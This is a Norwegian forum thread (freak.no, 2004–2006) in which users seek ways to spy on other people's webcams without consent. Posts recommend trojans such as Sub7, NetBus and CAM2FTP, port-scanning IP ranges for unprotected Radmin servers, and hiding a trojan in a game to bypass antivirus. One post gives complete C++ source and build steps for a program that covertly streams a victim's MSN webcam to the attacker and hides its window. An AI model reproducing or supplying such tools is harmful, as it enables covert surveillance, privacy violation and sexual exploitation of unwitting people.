Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  234 61596
Opprinnelig postet av Kalakov
OT: Hvordan kan en finne IP'en til noen over msn?
Vis hele sitatet...
Du kan bruke netlimiter og se hvilke connections du har via MSN.
Går det ann å bruke dos-commandoen "netstat" eller er jeg på jordet?
Det skal også gå ann, ja!
noen som har fått dette programmet til å fungere? jeg får ikke connecta noen..
Jeg har heller ikke fått det til å fungere i det hele tatt...
Har prøvd å DNSa noen folk og prøvd å connecte, men ser ikke ut som at det funker...
Opprinnelig postet av Wild
Prøv denne

Crack
Vis hele sitatet...
Får bare connecta til meg selv jeg.
Skulle vel bare mangle egentlig. Om det var så lett å få remote access ville det programmet ha vært litt mer annerkjent :P
Opprinnelig postet av Kalakov
Skulle vel bare mangle egentlig. Om det var så lett å få remote access ville det programmet ha vært litt mer annerkjent :P
Vis hele sitatet...
Hva må man gjøre da? Åpne porter? Legge noen ting på vedkommenes maskin?
Jeg vil tippe at maskinen du skal koble deg til m¨å ha port x åpnet...
Skaff en port scanner som scanner etter en spess port (den porten som radmin.server bruker som default), over en range (f.eks 123.123.123.0 til 123.123.123.255). Dermed kan du connecte. Så må du bare finne brukernavn/pass, hvis det trengs. (finn ut om det er et default pass i radmin, kan være heldig)..

Obs: visse isp'er godtar ikke at man portscanner.. som feks telenor. Da stenger dem delvis ned linja og bare web surfing, mail og msn vil funke.. +- Scan med måte, så går det nok bra.
en kom ikke noe særlig lengre med denne posten eller?
Opprinnelig postet av Kalakov
Går det ann å bruke dos-commandoen "netstat" eller er jeg på jordet?
Vis hele sitatet...
Send/motta en fil fra den du vil ha IP-en til. Mens filen overføres
starter du opp kommandolinjen og skriver Netstat -A
I listen som kommer frem vil du finne IP-en hans.
Jeg tror ikke dette virker i de nyeste versjonene av MSN, men det
kan hende de funker i Windows Messenger...
Opprinnelig postet av Kalakov
Går det ann å bruke dos-commandoen "netstat" eller er jeg på jordet?
Vis hele sitatet...
ja du kan bruke netstat.
start cmd skriv inn netstat, send et bilde ellerno til en du vil se webcamet til mens du sender fila skriver du netstat igjen så ser hvilken ip som er ny

edit: ops hoppa over diddl
edit2: forresten, gjør dt noe om jeg sitter bak router?
Sist endret av Rupi; 7. desember 2004 kl. 20:34.
finne ip'en er vel ikke problemet, men ett programs om kan overvåke en persons webcam...

det posten egentlig omhandler
▼ ... over en uke senere ... ▼
*bump*
det vi trenger er å forstå hvordan msn webcam funksjonen (som er utviklet av logitech?) fungere. feks; sendes den ukryptert? på hvilken port og hvilken protokoler er i bruk ?

når vi forstår det så kan man da også finne en måte å omgå problemet på.

fant ikke noe på et 12 siders langt goggle søk.. noen som har input her ?
Hvilke port er det webcam bruker? Det må jo gå ann å lage et program som bruker denne porten ekstern. Uten at de må godkjenne??
Psych|Com: nå er ikke jeg ekspert på området, men går det ikke an å bruke et program av et slag til å overvåke all informasjon som blir sendt ut av datan gjennom de forskjellige portene og gå videre derfra?
jo, jeg mener en kamerat av meg hadde noe sånt.. hendig..
men allt msn "hacke"-styret kunne lett unngås hvis noen her hadde hatt nok kunskaper innenfor programmering, noe det faktisk virker som, kunne laget en slags "trojan" som kun streamet webcamen til en port. ved å hacke msn avhenger det også av at personen faktisk sender webcam til en annen, hvis jeg har forstått riktig.
pettersmart; joda det fins. amass. men jeg bare gav innputt her slik at dere ikke sitter å spør om noen har en crack...
▼ ... noen måneder senere ... ▼
HaZnO's Avatar
Trådstarter
Hm.. Noen som har kommet over en måte å glo andre sine webcam uten samtykke fra "offeret" enda?
▼ ... noen uker senere ... ▼
Jeg bumper igjen jeg. Har veldig lyst på noe slikt:P
Jeg hørte med en kar om han hadde giddet å lage et sånt program. Får se om han fikk tid, driver med så mye annet rart også

Skal si fra isåfall...
Får ikke til AWRC... Får bare beskjed om at nettverksbanen er ikke tilgjengelig. Noen som kan hjelpe?
Sist endret av ^V|per^^; 15. mars 2005 kl. 23:18.
Samme problemet her...

Offtopic: Vil heller ennbefale DameWare, du må vite passord/brukernavn, men da kan du installere server filen fra din egen pc uten at offeret merker noe. Har selv prøvd det, og det virker. Litt kjipt at du trenger passord og sånt da

Jeg har forresten en ip scanner som scanner etter radmin servere som ikke har passord. Hvis noen vil ha den kan de sende meg en PM.


EDIT: Q: When trying to connect, I get the error "The Network Path was not found"?

A: The connection is made by Microsoft Networks not by AWRC. This is not an AWRC error. You have to search for possible explanations within the Microsoft site or try this link.

Porter som være åpne: 135, 137, 138, 139 eller 445
Du må også ha klient for Microsoft Netverk og Fil og printer deling aktivert på maskinen du skal koble deg til.

-http://www.atelierweb.com/rcomm/faq.htm
Sist endret av Cybergasm; 16. mars 2005 kl. 02:22.
hmm...har bare lest igjennom posten nå, men som jeg har oppfattet så har dere ikke funnet ut noe enda. Utenom med bruk av radmin.
Men vis man får tak på litt info om hvordan osv webcam vis msn sendes skal det vell gå ann og lage en liten bakdør der? :P

er selfølgelig gira på denne posten jeg også! hehe
Gikk ikke og edite lenger så skriver en ny en, beklager . Mente Hvis man finner noe info om hvordan webcam sendes via msn. Finner man noe info der skal de vell gå ann og lage en bakdør e.l
▼ ... noen uker senere ... ▼
Noen som finner ut noe?
▼ ... noen måneder senere ... ▼
Det hadde vært fett om man kunne se "hvem-som-helst-som-har-webcam-ikke-bare-msn-folk"

Noen som har gått i tenkeboksen og funnet ut noe?
Sitat av Malbolgia
Jeg synes å huske en funksjon i Sub7 som lot deg se på webcammet til den infiserte brukeren.
Send nyeste patch til ei jente som ikke har anti-virus og spioner på den måten, kanskje?
Vis hele sitatet...
den der husker jeg, synd jeg ikke har det programet fortiden..


om jeg ikke tar feil står det her inn:
http://www.hackpr.net/indexp.php / det eneste problemet er at jeg ikke kan dette språket. noen som kan hjelpe?
Sist endret av zeronz; 16. juni 2005 kl. 12:53.
CAM2FTP

Programmed by: PrinceAli
Language: Delphi
Release Date: 12/12/2003
Download Size: 576KB
Downloads: 739
Description:
Webcam logger, that will send pictures to a FTP, like a keylogger. Use PNG for awesome quality and small filesize.

Finens på:
http://www.nuclearwinter.us/

ellers bare å bruke andre trojaner, svært mange har webcam spy funksjon
▼ ... noen uker senere ... ▼
Finner dere ut noe? hadde vært interressant
▼ ... noen måneder senere ... ▼
tenkte bare å refreshe denne threaden å åpne for folks interesse igjen? er så lenge siden å ett slikt program som fikk oss til å specce cam uten tilatelse må jo være genialt, eller det er jo genialt! det cam to ftp orker jeg ikke, det er sånn ett bilde vært 10min liksom ?
Lastet en gang ned noe som heter MMD Cam Explorer. Der kan du se på noen webcam som folk selv har valgt å dele.
Men har ikke kjørt det så mye, er noe snusk med det. F.eks etter at du har lukket programmet kjører fortsatt prosessen i bakgrunnen (ingenting nytt i oppgavelinjen så er vel en trojan eller noe) Windowns begynner også å oppføre seg litt mer tullete en normalt så...
Men si gjerne ifra om dere finner et lett webcamprogram uten skjulte snuskeprogrammer på titterens maskin.
Og på en webcam jeg lånte for to år siden sto det på kameraet når det sendte, bare som en advarsel på dere som spionerer, det kan oppdages
(startet heldigvis ingen sendinger fra meg som jeg ikke hadde godkjent)
Sist endret av Henriken; 6. desember 2005 kl. 18:21. Grunn: Rette skriveleif
▼ ... over en måned senere ... ▼
Refresh

Noen som har kommet videre med dette?
Jeg er også interessert i noe slikt som dette.
Har noen funnet / laget noe enda?
Sist endret av tSig; 26. januar 2006 kl. 22:05. Grunn: skrivefeil
Vet ikke om detta er til hjelp men, jeg skriver det forde! Og en annen ting, har ikke lest igjennom alle postene, så vet ikke om detta her er posta fra før, menne det skjeit vi i nå

Jeg brukte netbus til detta! Kan ta noen bilder a cammet! Menne husker ikke om den sendte live eller om det bare var bilder! Jeg brukte iallefall netbus, dah kan en ha det litt mer morro enn bare å se på cammet Funker ikke med netbus 1,x ! Du trenger Netbus 2 Pro ! Serial til detta finner du ut Eneste er at du må sende denne patchen alle snakker om! Menne det som er litt forskjell på v2 i forhold t v1,x var at på på v1,x var d bare å dobbelklikke på patchen og wolla! På v2 får man opp et vindu der man kan sette passord og bla bla bla! Menne jeg mekka bare patchen inn i et program jeg laga sånn i full fart! Lagde spillet orm og når man åpnet spillet kjørte man samtidig denne patchen med diverse paramenter som gjorde at vinduet ikke kom opp og at "serveren" satt opp et passord som jeg valgte selv osv! For og fixe antivirusen gjorde jeg noen andre trix, menneh d behøver jeg nok ikke forklare her:P hehe Lykke til
▼ ... mange måneder senere ... ▼
[COLOR=DarkRed]har et program som gjør akk det der..
eneste abret er at de må starte det, med mindere du legger inn en auto start funksjon i koden, noe jeg ikke har stresset med å gjøre, og det funker å se på fine damer med det JA:P
det er skrevet av Tuxeren[/COLOR]

Kode

http://www.bloodshed.net/download.html

Der er en link til ett gratis kodeprogram som heter dev-c++, som tuxeren har brukt for å lage trojaneren. Når dere har lastet ned programmet så start det. (Ja faktisk)
trykk på arkiv -> nytt prosjekt.
Velg windows application, da kommer det opp hvor dere vil lagre programmet.
Pass på at alle filer kommer i samme mappe.
Når dere har gjort det så kommer det til å komme opp masse tekst til høyre i dev-c++
ta bort all tekst så at det er rent i ruten. Kopier deretter:

Kode:

Kode

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;
CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger);
cName = "Din e-mail";
BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
vName.vt = VT_BSTR;
vName.bstrVal = (BSTR)pbstrName;
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();
// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);
pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Når dere har kopiert inn teksten skal dere trykke på: prosjekt-> prosjekt alternativer. Da kommer det opp en rute der dere skal velge paramantere. Trykk på knappen "legg till bibliotek" og bla dit du instalerte dev-c++ (C:/dev-cpp/) i den mappen finns det en mappe som heter lib, gå inn i den og markere "libole32.a" og "liboleaut32.a" og trykk åpne. Når dere har gjort det skal dere legge til enda en .lib fil som finnes på: http://www.msghelp.net/attachment.php?pid=280776 Last ned filene og legg de i samme mappe som allt det andre klikk på legg til bibliotek igjen og bla fram til mappen der du lagret alt og der ska filene ligge som du nettopp lastet ned. markere "msgrguid.lib" og trykk på legg till. Nå skal dere legga til de andre to filene som fantes med i mappen dere lastet ned. Til venstre i dev-c++ programmet så finnes det ett fil-tre, høyreklikk på den øverste mappen som *"main.cpp" ligger i og velg "legg til prosjekt" gå deretter til mappen der alt ligger og marker "msgrua.h" og "msgruid.h" og velg åpne. Nå skal programmet være klart til å komplimeres. Trykk på komplimer (en knapp med fire ruter på) eller ctrl+f11. Lagre fila i samme mappe. Nå skal fila være klar. Om det blir noe feil kan det være fordi filene ikke er i samme mappe. Om fila fungerer skal det finnes to rader med tekst der det står: .drectv`-default:uuid.lib ' unrecognized .drectv`-default:uuid.lib ' unrecognized Der det i kilden står "Din e-mail" må du sette inn din epost. Takk til Tuxeren! Jeg har ikke gjort noe som helst.

[COLOR=DarkGreen]Edit: lagt inn kode=)[/COLOR]

den skal funke (dvs, den fungerte hos meg, men ikke hos en kompis å kompelere men ellers funker det FETT)

Happy peeking
Sist endret av Morthez; 27. august 2006 kl. 02:45.
får ikke til å finne libole32.a liboleaut32.a filene hvor er de ? =p
Har mekka det lille programmet med c++, men har fortsatt ingen anelse om hvrd jeg skal bruke d
Hmm... Jeg skjønte ikke mye av dette. Noen som har laget noe ferdig, som fungerer?
Legg gjerne ut et prosjekt i zip-fil eller noe, hvor man kun trenger å endre e-post. Dette var jo spennende!
Bah... http://www.freakforum.nu/forum/showt...070#post758070 . Les og følg guiden jeg lagde der. Tatt opp før, ikkeno vits å bumpe denne =/
http://rapidshare.de/files/31345474/...rojan.zip.html

Last ned, funker Men andre personen må åpne fila da, + vedkommende må ha samma MSN versjon som deg.
kan den du prøver å "lure" til å vise camm'en, få virus???
Sitat av fyll0
kan den du prøver å "lure" til å vise camm'en, få virus???
Vis hele sitatet...
Når du kan klare å få dem til å åpne "cam-fila", så kan sikkert folk lure dem til å åpne virus også.

Men nei, de får ikke virus av den webcam-fila.
▼ ... noen måneder senere ... ▼
please forny den rapidshare linken ! har letet i evigheter etter et sånn prog... og når jeg endelig finner det virker ikke linken lengre ! typisk :/
typisk ja, "file not found"

Vis de andre åpner fila, å de sletter den igjen. vises cammen da?
Burde lagt inn i koden så det starter hver gang windows starter
Sitat av h4llik
Burde lagt inn i koden så det starter hver gang windows starter
Vis hele sitatet...
Word

Det må da finnes noen i den ehm, "fargerike", medlemsbasen på nFF som er i stand til, og gidder å gjøre dette?

Mye av poenget forsvinner liksom om du må få personen til å åpne den på nytt hever gang.
"Det er femte gangen du sender meg den fila nå, og det skjer jo aldri noe?"
"Nei, men den skal da virke, gjør det for meg..."
Begrensa hvor lenge folk biter på den?
var en kopis av meg som hadde et slikt program for noen måneder siden.. da kunne vi se på andre sine cam uten at de fikk vite det